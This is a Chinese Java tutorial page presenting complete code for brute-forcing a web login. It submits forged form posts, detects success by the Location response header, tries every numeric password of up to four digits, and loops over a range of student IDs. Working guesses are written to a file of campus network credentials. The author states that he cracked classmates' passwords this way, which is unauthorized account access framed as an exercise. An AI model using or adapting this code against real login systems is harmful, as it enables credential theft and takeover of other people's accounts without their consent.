歡迎來到Linux教程網
設為首頁 加入收藏
Linux教程網
Linux教程網
Linux教程網
Linux教程網 >> Linux編程 >> Linux編程 >> Java網絡編程五:暴力法破解登錄系統的完全實現

Java網絡編程五:暴力法破解登錄系統的完全實現

日期:2017/3/1 10:56:04   编辑:Linux編程

注:以下破解思路及代碼源自我同學木子

1、先來看一個無任何安全措施的登錄系統的破解方法:每次模擬表單提交,若登錄成功,此時返回的報頭信息中有Location字段,登錄失敗無此字段,繼續模擬登錄。直到破解成功,本人成功破解部分同學校園網登錄密碼(純四位數字的)代碼如下:

  1. <span style="font-size:16px;">package demo.net;
  3. import java.io.IOException;
  4. import java.io.PrintWriter;
  5. import java.net.HttpURLConnection;
  6. import java.net.URL;
  8. import mine.util.io.TextFile;
  10. //暴力法破解簡單登錄系統:該系統無任何安全措施
  11. public class PostTest {
  12. String urlString = "登錄頁面的url";
  14. public PostTest() {
  15. }
  17. public PostTest(String urlString) {
  18. this.urlString = urlString;
  19. }
  21. // 提交一次用戶請求
  22. private boolean doPost(String user, String password) {
  23. boolean sucess = false;
  24. try {
  25. URL realUrl = new URL(urlString);
  26. HttpURLConnection conn = (HttpURLConnection) realUrl
  27. .openConnection();
  28. conn.setDoOutput(true);
  29. conn.setDoInput(true);
  30. conn.setInstanceFollowRedirects(false);
  32. // 提交表單,發送的數據是直接用Firebug截取的然後把用戶名,密碼部分換成參數
  33. PrintWriter out = new PrintWriter(conn.getOutputStream());
  34. out.print("要提交的表單信息");
  35. out.flush();
  37. // 如果登錄不成功,報頭中沒有Location字段,getHeaderField("Location") 返回null
  38. // 登錄成功,返回一個隨機的Location字段
  39. // System.out.println(conn.getHeaderFields());
  40. if (conn.getHeaderField("Location") != null) {
  41. sucess = true;
  42. }
  43. } catch (IOException e) {
  44. e.printStackTrace();
  45. }
  46. return sucess;
  47. }
  49. // 這是一個全排列算法, 對特定長度的密碼排列組合,把結果存入list
  50. // user:用戶名 , n:字符下標 , len:字符數組長度,也就是密碼長度
  51. private boolean createPassWord(String user, char[] str, int n, int len) {
  52. if (n == len) {
  53. String ps = new String(str);
  54. if (doPost(user, ps)) {
  55. // System.out.println("sucess:" + user + " : " + ps);
  56. TextFile.write("file/校園網用戶名及密碼.txt", true, "sucess:" + user
  57. + " : " + ps + "\n");
  58. return true;
  59. }
  60. return false;
  61. }
  62. for (int i = 0; i <= 9; i++) {
  63. str[n] = (char) (i + '0');
  64. if (createPassWord(user, str, n + 1, len))
  65. return true;
  66. }
  67. return false;
  68. }
  70. // 破解一個用戶的密碼
  71. public void test(String user) {
  72. for (int i = 0; i < 4; i++) {
  73. if (createPassWord(user, new char[i + 1], 0, i + 1))
  74. break;
  75. }
  76. }
  78. public static void main(String[] args) {
  79. PostTest pt = new PostTest();
  80. for (int i = 1; i <= 9; i++)
  81. pt.test("09050510" + i);
  82. for (int i = 10; i <= 31; i++)
  83. pt.test("0905051" + i);
  84. }
  85. }
  86. </span>

這個示例代碼中只破解密碼為4位或4位數字之內的密碼,大概破解一個用戶需要十分鐘。如果破解5、6...更長的密碼,破解時間將很長。

Linux編程

在C#中SendMessage和PostMessage的參數傳遞

U-Boot啟動方式源碼分析

Android -- AppWidget 進階篇

【OpenGL4.0】GLSL渲染語言入門與VBO、VAO使用:繪制一個三角形

Objective-C中單例類的聲明

Android中解析服務器發過來的JSON數據

Python中的異常處理

JS實現仙劍翻牌記憶力小游戲

Linux教程網

開源新聞速遞:VirtualBox 5.1 發布

今日關注甲骨文宣布 Oracle VM VirtualBox 5.1 發布。主要更新有:實現了

初學者如何熟悉Linux內存管理機制

2007年Linux平台下的7款最佳游戲

探索linux系統中限制對目錄作硬連接的原因

那個系統內核少而且文檔完整一些

Linux vsftp 部署&優化

solaris10下安裝libxml2的時候出現兩個問題

硬盤安裝FC6 Linux系統

Fedora8下COMPIZ裡的3D效果特酷(圖)

相关文章
Linux編程SHELL編程PERL編程
文章推荐
热点聚焦

C#如何判斷文件處於打開狀態

C/C++的mem函數和strcpy函數的區別和應用

改善Java程序的151個建議 讀後感

Linux中LCD設備驅動

正則表達式與greb

Mini2440開發板PWM驅動與測試程序簡要分析

C++11 之 nullptr

Java培訓:基本數據類型

Android 發送短信服務及其虛擬機測試

JNA調用C語言動態鏈接庫學習實踐總結

Copyright © Linux教程網 All Rights Reserved